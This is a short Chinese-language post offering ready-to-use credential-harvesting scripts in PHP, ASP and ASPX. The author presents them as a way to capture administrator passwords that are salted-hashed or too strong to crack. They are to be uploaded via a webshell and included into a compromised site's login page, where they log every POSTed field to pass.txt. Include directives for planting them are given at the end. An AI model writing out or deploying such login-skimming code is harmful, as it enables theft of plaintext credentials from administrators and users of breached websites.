写这些脚本主要是方便记录管理员的密码.
通常为 md5+salt 或者为 强密码 无法解密.
需要上传至 webshell.
脚本均已在本地测试成功.
在对应的 login 文件上 include 即可.
默认保存在同目录下的 pass.txt 记录所有 POST 变量
php
1
2
3
4
5
6
7
8
9
|
<?php
if (isset($_POST)){
$f = fopen('pass.txt','a+');
foreach ($_POST as $k=>$v){
fwrite($f,$k.':'.$v."\r\n");
}
fclose($f);
}
?>
|
asp
1
2
3
4
5
6
7
8
9
10
11
|
<%
dim fs,fname
set fs=Server.CreateObject("Scripting.FileSystemObject")
set fname=fs.OpenTextFile(server.mappath("pass.txt"),8,true)
For i = 1 To Request.Form.Count
fname.WriteLine(""&Request.Form.Key(i)&":" & Request.Form(Request.Form.Key(i)))
Next
fname.Close
set fname=nothing
set fs=nothing
%>
|
aspx
1
2
3
4
5
6
7
8
9
10
|
<%@ Page Language="Jscript"%>
<%@ import namespace="System.IO" %>
<%
var filepath = Server.MapPath("pass.txt");
var sw = new StreamWriter(filepath, true);
for (var i = 0;i<Request.Form.Count;i++){
sw.WriteLine(Request.Form.Keys[i].ToString() + ":" + Request.Form[i].ToString());
}
sw.Close();
%>
|
php 包含为 include 'config.php'
.
asp 与 asp.net 为 <!-- #include file="config.aspx" -->
.